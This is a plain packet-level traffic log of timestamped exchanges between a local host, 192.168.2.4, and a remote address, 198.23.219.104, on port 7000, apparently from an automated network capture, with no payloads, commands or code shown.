Oct 13, 2024 19:03:06.973201990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.014811993 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:07.019826889 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.077214956 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:07.078619003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.082195997 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.082246065 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:07.087201118 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.167155027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.168610096 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:07.173619032 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.262861013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:07.265091896 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:07.270039082 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.428549051 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.560616016 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.560889959 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:09.616962910 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:09.622060061 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622075081 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622098923 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622112036 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622123957 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622371912 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622384071 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:09.622395039 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.491842985 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.525456905 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:14.530769110 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530778885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530791998 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530798912 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530823946 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530829906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530905962 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:14.530910969 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.233550072 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:17.238580942 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.296045065 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:17.301148891 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.343599081 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.348737955 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:17.353653908 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.442658901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:17.448743105 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:17.453701019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.496920109 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.536727905 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:19.541944027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.541953087 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.541960955 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.541968107 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.541975975 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.541979074 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.542125940 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:19.542149067 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.420958996 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.425983906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.514992952 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.519938946 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.530275106 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.531332970 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.575546980 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.575704098 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.580600023 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.580650091 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.585417986 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.592788935 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.597656965 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.608431101 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.613358021 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.624152899 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.625392914 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.670115948 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.670279026 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.723519087 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.723687887 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.728709936 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.731528997 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.732440948 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.775017023 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.776004076 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.827454090 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.953957081 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:22.955379009 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:22.961354971 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.050689936 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.051991940 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:23.075340033 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.181699038 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.183460951 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:23.188668966 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.278489113 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.279890060 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:23.285000086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:23.285080910 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:23.290165901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.510097027 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.575656891 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:24.580817938 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580830097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580837965 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580847979 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580856085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580905914 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580919981 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:24.580929041 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.523241043 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.556369066 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:29.561758995 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.561875105 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.561887980 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.561898947 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.561911106 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.562032938 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.562045097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:29.562361002 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:30.389807940 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:30.394983053 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:30.500329018 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:30.502023935 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:30.507050037 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:31.557997942 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:31.780169010 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:32.764530897 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:32.769613981 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:32.875118017 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:32.876890898 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:32.882160902 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.499263048 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:34.504383087 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.522772074 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.559360981 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:34.564503908 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.564534903 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.564786911 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.564835072 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.652184010 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:34.653708935 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:34.703310966 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:35.655060053 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:35.659955025 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:35.765177011 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:35.769751072 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:35.775279999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:37.905422926 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:37.910460949 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.016177893 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.020433903 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.025448084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.671447039 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.676405907 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.764750004 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.769876957 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.781405926 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.783111095 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.831315994 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.831482887 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.836433887 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.874207973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.878310919 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.879081964 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.879916906 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.884798050 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.905040026 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.909924984 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.921010017 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.926013947 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.968782902 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.970202923 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:38.975178003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:38.998883009 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.000297070 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:39.047360897 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.098222971 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.099951982 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:39.104952097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.194155931 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.195776939 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:39.200782061 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.434283018 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.571981907 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.579345942 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:39.615358114 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:39.620351076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620464087 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620493889 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620546103 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620573044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620707989 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620774031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:39.620800972 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:42.498800039 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:42.503942013 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:42.609049082 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:42.611150980 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:42.616144896 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:43.998737097 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:44.003773928 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.108829975 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.115114927 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:44.120034933 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.853754044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.854979038 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.855150938 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:44.896075964 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:44.901050091 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901135921 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901149035 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901160002 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901170969 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901429892 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901441097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:44.901453018 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.521847010 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.552148104 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:49.557322025 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557352066 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557379961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557411909 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557436943 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557462931 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557615995 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:49.557665110 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:51.373785973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:51.379561901 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:51.484849930 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:51.490292072 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:51.495224953 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.521955967 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.588625908 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:54.593744993 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.593786001 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.593817949 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.593859911 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.593889952 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.593997002 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.594048977 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:54.594086885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:58.296181917 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:58.301430941 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:58.406779051 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:58.414731979 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:58.419661999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.326765060 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.331940889 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.357889891 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.363193989 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.373577118 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.378722906 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.437501907 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.440156937 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.445122004 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.534662008 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.536180973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.541284084 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.541481018 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.546607018 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.630268097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.660586119 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:03:59.665673018 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.665708065 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.665787935 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.665900946 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.665931940 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.665957928 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.666006088 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:03:59.666032076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:03.107994080 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:03.113208055 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:03.218492031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:03.221148014 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:03.226172924 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.522878885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.556901932 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:04.562045097 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562099934 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562128067 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562165022 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562176943 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562201977 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562319994 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.562355042 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.670339108 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:04.679303885 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.797907114 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:04.799392939 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:04.804342985 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:08.639131069 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:08.644220114 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:08.751590967 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:08.753396988 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:08.759232998 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.441170931 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.482645988 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:09.571578979 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.632086039 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:09.637132883 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637164116 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637206078 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637233019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637259960 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637604952 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637651920 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:09.637679100 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.521346092 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.567033052 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:14.572155952 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572192907 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572233915 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572261095 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572288990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572319031 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572577000 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.572603941 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.826745987 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:14.831907988 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.857709885 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:14.862821102 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.936219931 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:14.937113047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.941174030 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:14.941337109 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:04:14.946234941 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:15.026057005 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:04:15.027364969 CEST	49739	7000	192.168.2.4	198.23.219.104
